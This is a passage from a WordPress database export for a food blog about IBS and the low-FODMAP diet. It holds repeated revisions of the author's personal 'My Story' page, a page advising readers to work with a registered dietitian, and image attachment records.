Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes, tips and an exciting new book!!

Thank you checking in and hope you stay for a while.

Sara 

\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-22 08:15:17','2020-04-22 08:15:17','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5297,1,'2020-04-22 09:35:44','2020-04-22 09:35:44','','Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set','','inherit','open','closed','','blue-brushstroke-moms-influencer-asymmetry-facebook-post-set','','','2020-04-22 09:35:44','2020-04-22 09:35:44','',4863,'http://tummyrevolution.com/wp-content/uploads/2020/04/Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set.jpg',0,'attachment','image/jpeg',0),(5298,1,'2020-04-22 10:14:30','2020-04-22 10:14:30','','me-and-my-book3small','','inherit','open','closed','','me-and-my-book3small','','','2020-04-22 10:14:30','2020-04-22 10:14:30','',4863,'http://tummyrevolution.com/wp-content/uploads/2020/04/me-and-my-book3small.jpg',0,'attachment','image/jpeg',0),(5299,1,'2020-04-22 10:16:03','2020-04-22 10:16:03','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n



There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-22 10:16:03','2020-04-22 10:16:03','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5300,1,'2020-04-22 10:22:09','2020-04-22 10:22:09','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n


There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-22 10:22:09','2020-04-22 10:22:09','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5301,1,'2020-04-22 10:31:18','2020-04-22 10:31:18','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n


There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-22 10:31:18','2020-04-22 10:31:18','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5303,1,'2020-04-22 10:32:33','2020-04-22 10:32:33','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n


There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-22 10:32:33','2020-04-22 10:32:33','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5305,1,'2020-04-22 13:08:04','2020-04-22 13:08:04','','Debra-Thomas-.','','inherit','open','closed','','debra-thomas','','','2020-04-22 13:08:04','2020-04-22 13:08:04','',4890,'http://tummyrevolution.com/wp-content/uploads/2020/04/Debra-Thomas-..jpg',0,'attachment','image/jpeg',0),(5306,1,'2020-04-22 13:08:23','2020-04-22 13:08:23','\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs. If you, for example, have other food allergies or underlying issues, a dietitian can help you work out if the low FODMAP diet is right for you and what the right approach is.

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. If you have questions or would like to set up an appointment/Skype call, you can find more information about Debra and her FODMAP Consultancy by visiting her website  https://www.fodmapconsultancy.com

\n\n\n\n
\"\"
\n\n\n\n

If you\'re looking for a UK dietitian near you then the British Dietetic Association has a great search tool HERE where you can search for registered dietitian in your area.

In the US \'The Academy of Nutrition and Dietetics\' has a similar search facility on their website, which you can find HERE

Dietitians of Canada has a dietitian search facility HERE

And Dietitians Association of Australia have a search facility to find an accredited practising dietitian HERE

\n\n\n\n

\n','Working with a Dietitian','','inherit','closed','closed','','4890-revision-v1','','','2020-04-22 13:08:23','2020-04-22 13:08:23','',4890,'http://tummyrevolution.com/4890-revision-v1/',0,'revision','',0),(5308,1,'2020-02-22 14:43:00','2020-02-22 14:43:00','\n\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n','Tummy Revolution the book','','publish','closed','closed','','tummy-revolution-the-book','','','2020-04-22 15:21:21','2020-04-22 15:21:21','',0,'http://tummyrevolution.com/?page_id=5308',0,'page','',0),(5309,1,'2020-04-22 14:30:34','2020-04-22 14:30:34','','2','','inherit','open','closed','','2-3','','','2020-04-22 14:30:34','2020-04-22 14:30:34','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/2-2.jpg',0,'attachment','image/jpeg',0),(5310,1,'2020-04-22 14:30:44','2020-04-22 14:30:44','','3','','inherit','open','closed','','3-2','','','2020-04-22 14:30:44','2020-04-22 14:30:44','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/3-1.jpg',0,'attachment','image/jpeg',0),(5311,1,'2020-04-22 14:30:51','2020-04-22 14:30:51','','4','','inherit','open','closed','','4-2','','','2020-04-22 14:30:51','2020-04-22 14:30:51','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/4-1.jpg',0,'attachment','image/jpeg',0),(5312,1,'2020-04-22 14:31:02','2020-04-22 14:31:02','','5','','inherit','open','closed','','5-2','','','2020-04-22 14:31:02','2020-04-22 14:31:02','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/5-1.jpg',0,'attachment','image/jpeg',0),(5313,1,'2020-04-22 14:31:13','2020-04-22 14:31:13','','6','','inherit','open','closed','','6-2','','','2020-04-22 14:31:13','2020-04-22 14:31:13','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/6-1.jpg',0,'attachment','image/jpeg',0),(5314,1,'2020-04-22 14:31:21','2020-04-22 14:31:21','','7','','inherit','open','closed','','7-2','','','2020-04-22 14:31:21','2020-04-22 14:31:21','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/7-1.jpg',0,'attachment','image/jpeg',0),(5315,1,'2020-04-22 14:31:29','2020-04-22 14:31:29','','8','','inherit','open','closed','','8','','','2020-04-22 14:31:29','2020-04-22 14:31:29','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/8.jpg',0,'attachment','image/jpeg',0),(5316,1,'2020-04-22 14:31:37','2020-04-22 14:31:37','','9','','inherit','open','closed','','9','','','2020-04-22 14:31:37','2020-04-22 14:31:37','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/9.jpg',0,'attachment','image/jpeg',0),(5317,1,'2020-04-22 14:31:44','2020-04-22 14:31:44','','10','','inherit','open','closed','','10','','','2020-04-22 14:31:44','2020-04-22 14:31:44','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/10.jpg',0,'attachment','image/jpeg',0),(5318,1,'2020-04-22 14:32:43','2020-04-22 14:32:43','','Green and Cream Simple Sales Marketing Presentation','','inherit','open','closed','','green-and-cream-simple-sales-marketing-presentation','','','2020-04-22 14:32:43','2020-04-22 14:32:43','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/Green-and-Cream-Simple-Sales-Marketing-Presentation.jpg',0,'attachment','image/jpeg',0),(5319,1,'2020-04-22 14:33:05','2020-04-22 14:33:05','\n\n','Tummy Revolution the book','','inherit','closed','closed','','5308-revision-v1','','','2020-04-22 14:33:05','2020-04-22 14:33:05','',5308,'http://tummyrevolution.com/5308-revision-v1/',0,'revision','',0),(5320,1,'2020-04-22 14:34:03','2020-04-22 14:34:03','','2-3','','inherit','open','closed','','2-3-2','','','2020-04-22 14:34:03','2020-04-22 14:34:03','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/2-3.jpg',0,'attachment','image/jpeg',0),(5321,1,'2020-04-22 14:35:04','2020-04-22 14:35:04','\n\n\n\n\n
\"\"
\n','Tummy Revolution the book','','inherit','closed','closed','','5308-revision-v1','','','2020-04-22 14:35:04','2020-04-22 14:35:04','',5308,'http://tummyrevolution.com/5308-revision-v1/',0,'revision','',0),(5322,1,'2020-04-22 14:36:23','2020-04-22 14:36:23','','Green-and-Cream-Simple-Sales-Marketing-Presentation-1','','inherit','open','closed','','green-and-cream-simple-sales-marketing-presentation-1','','','2020-04-22 14:36:23','2020-04-22 14:36:23','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/Green-and-Cream-Simple-Sales-Marketing-Presentation-1.jpg',0,'attachment','image/jpeg',0),(5323,1,'2020-04-22 14:36:36','2020-04-22 14:36:36','\n\n\n\n\n
\"\"
\n','Tummy Revolution the book','','inherit','closed','closed','','5308-revision-v1','','','2020-04-22 14:36:36','2020-04-22 14:36:36','',5308,'http://tummyrevolution.com/5308-revision-v1/',0,'revision','',0),(5324,1,'2020-04-22 14:37:58','2020-04-22 14:37:58','','3-2','','inherit','open','closed','','3-2-2','','','2020-04-22 14:37:58','2020-04-22 14:37:58','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/3-2.jpg',0,'attachment','image/jpeg',0),(5325,1,'2020-04-22 14:38:28','2020-04-22 14:38:28','','4-2','','inherit','open','closed','','4-2-2','','','2020-04-22 14:38:28','2020-04-22 14:38:28','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/4-2.jpg',0,'attachment','image/jpeg',0),(5326,1,'2020-04-22 14:39:26','2020-04-22 14:39:26','','5-2','','inherit','open','closed','','5-2-2','','','2020-04-22 14:39:26','2020-04-22 14:39:26','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/5-2.jpg',0,'attachment','image/jpeg',0),(5327,1,'2020-04-22 14:40:13','2020-04-22 14:40:13','','6-2','','inherit','open','closed','','6-2-2','','','2020-04-22 14:40:13','2020-04-22 14:40:13','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/6-2.jpg',0,'attachment','image/jpeg',0),(5328,1,'2020-04-22 14:40:46','2020-04-22 14:40:46','','7-2','','inherit','open','closed','','7-2-2','','','2020-04-22 14:40:46','2020-04-22 14:40:46','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/7-2.jpg',0,'attachment','image/jpeg',0),(5329,1,'2020-04-22 14:41:16','2020-04-22 14:41:16','','8-1','','inherit','open','closed','','8-1','','','2020-04-22 14:41:16','2020-04-22 14:41:16','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/8-1.jpg',0,'attachment','image/jpeg',0),(5330,1,'2020-04-22 14:41:34','2020-04-22 14:41:34','','9-1','','inherit','open','closed','','9-1','','','2020-04-22 14:41:34','2020-04-22 14:41:34','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/9-1.jpg',0,'attachment','image/jpeg',0),(5331,1,'2020-04-22 14:42:12','2020-04-22 14:42:12','','10-1','','inherit','open','closed','','10-1','','','2020-04-22 14:42:12','2020-04-22 14:42:12','',5308,'http://tummyrevolution.com/wp-content/uploads/2020/04/10-1.jpg',0,'attachment','image/jpeg',0),(5332,1,'2020-04-22 14:42:25','2020-04-22 14:42:25','\n\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n\n\n\n
\"\"
\n','Tummy Revolution the book','','inherit','closed','closed','','5308-revision-v1','','','2020-04-22 14:42:25','2020-04-22 14:42:25','',5308,'http://tummyrevolution.com/5308-revision-v1/',0,'revision','',0),(5335,1,'2020-04-22 14:47:36','2020-04-22 14:47:36','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I initially studied and later meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures, food and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn, who are my fabulous food critics. They will tell me honestly if what I cook is good or bad and love sampling my food, especially the deserts and treats.

\n\n\n\n
\"\"
\n\n\n\n


Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

If you\'d like further help and advice I\'ve published a book, \'Tummy Revolution 21, Gut Health Made Simple\' . It\'s a 21 day plan to help you get your tummy back on track. It contains, weekly meal plans, shopping lists 50+ recipes, Youga exercises and much, much more. It\'s your ultimate guide to taming your tummy and to getting your health back on track. You can read more about it here

\n\n\n\n
\"\"
\n\n\n\n


There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes and tips!!
Thank you checking in and hope you stay for a while.
xoxo
Sara 

\n\n\n\n
\"\"/
\n\n\n\n


\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-22 14:47:36','2020-04-22 14:47:36','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5336,1,'2020-04-22 14:47:40','2020-04-22 14:47:40','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

